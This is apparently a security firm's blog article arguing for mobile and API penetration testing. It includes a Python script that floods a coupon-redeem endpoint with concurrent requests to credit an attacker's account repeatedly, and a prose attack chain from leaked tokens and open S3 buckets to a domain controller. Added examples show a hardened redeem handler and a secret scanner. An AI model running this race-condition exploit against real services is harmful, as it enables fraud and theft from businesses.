Mobile App Security: The Imperative for Mobile Penetration Testing

Mobile App Penetration Testing

Mobile apps have become an integral part of our daily lives. From ordering food to booking a ride, there is an app for almost everything. However, as the usage of mobile apps has grown, so has the concern around mobile app security.

The mobile app security landscape has become more complex due to the diverse range of devices, mobile operating systems, and applications. In today’s technology landscape, where mobile apps are widely used, the importance of mobile app security cannot be overstated.

One way to ensure mobile app security is to conduct mobile penetration testing. Penetration testing is the process of evaluating the security of a system or application by simulating an attack from a malicious actor. This activity helps identify vulnerabilities in an application that could be exploited by attackers. Using dynamic analysis, an attacker can monitor the API requests that the mobile application sends to its various microservices. Those back-end calls expand a company’s attack surface, and they are easily overlooked.

API Security: Protecting Against Mobile App Vulnerabilities

APIs, or Application Programming Interfaces, allow different applications to communicate with each other. Mobile APIs introduce an additional threat vector that requires its own vulnerability checklist, as outlined in the OWASP API Top 10. This, combined with the OWASP Mobile Top 10, provides attackers with a multitude of options to exploit vulnerabilities.

Against APIs, attackers can reuse tactics from web application attacks: abusing broken function level authorization, looking for IDORs (Insecure Direct Object References), or exploiting race conditions where rate limiting is absent. The convergence of these two attack surfaces enlarges the attacker’s arsenal and emphasizes the importance of securing mobile APIs.

Below is an example of Python code that exploits a race condition to redeem a coupon more than once in quick succession, adding credit to an attacker’s account by abusing a flaw in the application’s business logic:


import json
import requests
import grequests
from time import sleep

# Define the base URL and headers for the requests
BASE_URL = "https://api.example.invalid"  # placeholder: the real value is not given on the page
headers = {"Content-Type": "application/json"}

# Define functions for making requests
def redeemAsync(email, token, code, nTimes):
    # Send nTimes redeem requests concurrently so they reach the server at once
    data = {"email": email, "token": token, "code": code}
    rs = (grequests.post(BASE_URL + "/redeem", data=json.dumps(data), headers=headers)
          for i in range(nTimes))
    return grequests.map(rs)

def redeem(email, token, code):
    # Send a single, sequential redeem request
    data = {"email": email, "token": token, "code": code}
    resp = requests.post(BASE_URL + "/redeem", data=json.dumps(data), headers=headers)
    return resp.json()

def makeRequest(email, token, endpoint):
    resp = requests.get(BASE_URL + endpoint, params={"email": email, "token": token})
    return resp.json()

def getBalance(email, token):
    return makeRequest(email=email, token=token, endpoint="/balance")

def redeemTicket(email, token):
    return makeRequest(email=email, token=token, endpoint="/redeemticket")

if __name__ == "__main__":
    email = ""
    token = "JWT TOKEN HERE"
    code = "ALTIMETRIK1337"
    reqAsync = True
    nTimes = 2
    while True:
        balanceResp = getBalance(email, token)
        if "balance" in balanceResp:
            balance = float(balanceResp["balance"])
            print("Current Balance:", balance)
            if balance > 5000:
                redeemTicketResp = redeemTicket(email, token)
                print("Ticket:", redeemTicketResp)
                break
        # The original listing stops above; the rest of the loop body only wires up
        # the flags it defines: burst the coupon redemption, then poll the balance again
        if reqAsync:
            redeemAsync(email, token, code, nTimes)
        else:
            redeem(email, token, code)
        sleep(1)

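The server-side counterpart to the race above, as an added example that is not part of the original post: a check-then-act redeem handler beside an atomic one, each hit by two concurrent requests against constructed in-memory state. The Store class, the coupon value and the barrier that forces the interleaving are assumptions made for the demonstration.

```python
import threading

COUPON_VALUE = 100.0  # constructed coupon value for the demo

class Store:
    """Constructed in-memory stand-in for the application's database."""
    def __init__(self, code):
        self.unused = {code}          # coupon codes not yet redeemed
        self.credits = []             # one entry per successful redemption
        self.lock = threading.Lock()

def redeem_vulnerable(store, code, barrier=None):
    """Check-then-act: the 'unused?' check and the 'mark used' write are separate
    steps, so two requests sent at once (the grequests burst above) both pass the
    check before either marks the coupon used. The barrier only forces that
    interleaving deterministically for the demo."""
    if code not in store.unused:          # step 1: check
        return False
    if barrier is not None:
        barrier.wait()                    # both requests are now past the check
    store.unused.discard(code)            # step 2: act, too late to be safe
    store.credits.append(COUPON_VALUE)
    return True

def redeem_hardened(store, code):
    """Atomic consume: check and mark-used happen under one lock, so exactly one
    request wins. SQL equivalent: UPDATE coupons SET used=1 WHERE code=? AND
    used=0, crediting only when rowcount == 1."""
    with store.lock:
        if code not in store.unused:
            return False
        store.unused.discard(code)
        store.credits.append(COUPON_VALUE)
    return True

def race(fn, store, code, **kwargs):
    """Send two 'requests' concurrently and return the credited balance."""
    threads = [threading.Thread(target=fn, args=(store, code), kwargs=kwargs)
               for _ in range(2)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sum(store.credits)

def demo(code="ALTIMETRIK1337"):
    vuln = race(redeem_vulnerable, Store(code), code, barrier=threading.Barrier(2))
    hard = race(redeem_hardened, Store(code), code)
    return vuln, hard  # (200.0, 100.0): double credit vs. single credit
```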

By leveraging application data, attackers can breach cloud infrastructure and gain access to internal networks if their environment uses a hybrid solution such as Azure Active Directory. For instance, attackers can comb through the source code of a mobile app to uncover weak passwords or other vulnerabilities in the cloud infrastructure.

They can also scour through public repositories that contain old, forgotten and still valid secret keys or tokens to access cloud assets or API endpoints that are referenced in the mobile application.

Attackers can use the mobile application server as a foothold for lateral movement into the cloud network, find a machine joined to the on-prem Active Directory, and from there reach the Domain Controller and compromise the internal network.

Below is an attack chain that illustrates this:

In many cases, the application may reveal information about storage locations, such as an insecure S3 bucket, which can be accessed with weak authorization mechanisms or no authorization mechanism at all. In some instances, the S3 bucket may store PCI information from customers.
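An added example, not from the original post, for the hardcoded secrets and storage references discussed above: a pre-release scan over constructed strings of the kind pulled from a decompiled build, flagging AWS access key IDs, S3 bucket URLs and embedded JWTs, and noting whether a JWT carries an exp claim at all. The sample strings, patterns and function names are assumptions.

```python
import base64
import json
import re

# Constructed sample of the kind of strings pulled from a decompiled build
# (e.g. `strings` over an APK's resources). Values are fabricated; the AWS key
# is Amazon's documented example key, not a live credential.
SAMPLE = """\
api.base=https://api.example-app.invalid/v1
aws.access_key=AKIAIOSFODNN7EXAMPLE
upload.bucket=https://customer-receipts.s3.us-east-1.amazonaws.com/
legacy.token=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJzdmMtYXBwIn0.c2ln
"""

PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "jwt": re.compile(r"\beyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\b"),
    "s3_bucket_url": re.compile(r"https?://[a-z0-9.-]+\.s3[.-][a-z0-9.-]*amazonaws\.com\S*"),
}

def _b64url_json(segment):
    """Decode one base64url JWT segment (padding restored) to a JSON object."""
    pad = "=" * (-len(segment) % 4)
    return json.loads(base64.urlsafe_b64decode(segment + pad))

def jwt_has_expiry(token):
    """True if the JWT payload carries an 'exp' claim. A token without one stays
    valid until the signing key is rotated, which is why tokens forgotten in old
    builds or public repositories remain usable."""
    try:
        return "exp" in _b64url_json(token.split(".")[1])
    except (ValueError, IndexError, TypeError):
        return False

def scan(text):
    """Return one finding per hit: (kind, line_no, redacted_value, note).
    Values are redacted so the report itself does not leak the secret."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for kind, rx in PATTERNS.items():
            for m in rx.finditer(line):
                val = m.group(0)
                note = ""
                if kind == "jwt":
                    note = "has exp" if jwt_has_expiry(val) else "no exp claim"
                findings.append((kind, line_no, val[:6] + "...", note))
    return findings
```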

This underscores the importance of securing mobile apps and their corresponding APIs to prevent attackers from exploiting vulnerabilities and gaining unauthorized access to sensitive information.

Designing Secure APIs and Comprehensive Mobile App Testing

It is important to ensure that APIs are designed with security in mind from the outset. This includes implementing authentication and authorization controls to ensure that only authorized users can access the API, as well as implementing encryption to protect sensitive data in transit. It is also important to validate input data to prevent attacks such as SQL injection and cross-site scripting.

Regular security testing and vulnerability assessments can also help identify and remediate API vulnerabilities.

To enhance the security of your mobile applications, we highly recommend conducting both static and dynamic analysis. By employing static analysis, expert security engineers can meticulously scan your application’s code to identify any potential business logic flaws, insecure permissions, and sensitive information disclosure before the application goes live.

Moreover, dynamic analysis is equally critical for detecting issues that go unnoticed during static analysis. Security teams can monitor web traffic in real time, examine the application from a user’s perspective, and identify any potential routes for attackers to exploit or escalate their privileges.

This thorough approach enables security teams to deliver an all-inclusive testing project that ensures the completeness and consistency of your mobile application. With this comprehensive testing approach, you can have confidence that your mobile application is secure, reliable, and fully optimized for seamless performance.


In conclusion, conducting mobile API testing is a crucial step to guarantee the security not only of mobile applications, but also of any other assets or infrastructure that might be linked to them. By thoroughly testing the APIs, potential vulnerabilities can be identified and addressed before they can be exploited by malicious actors, safeguarding your organization’s sensitive data and reputation.

Matthew Manalac
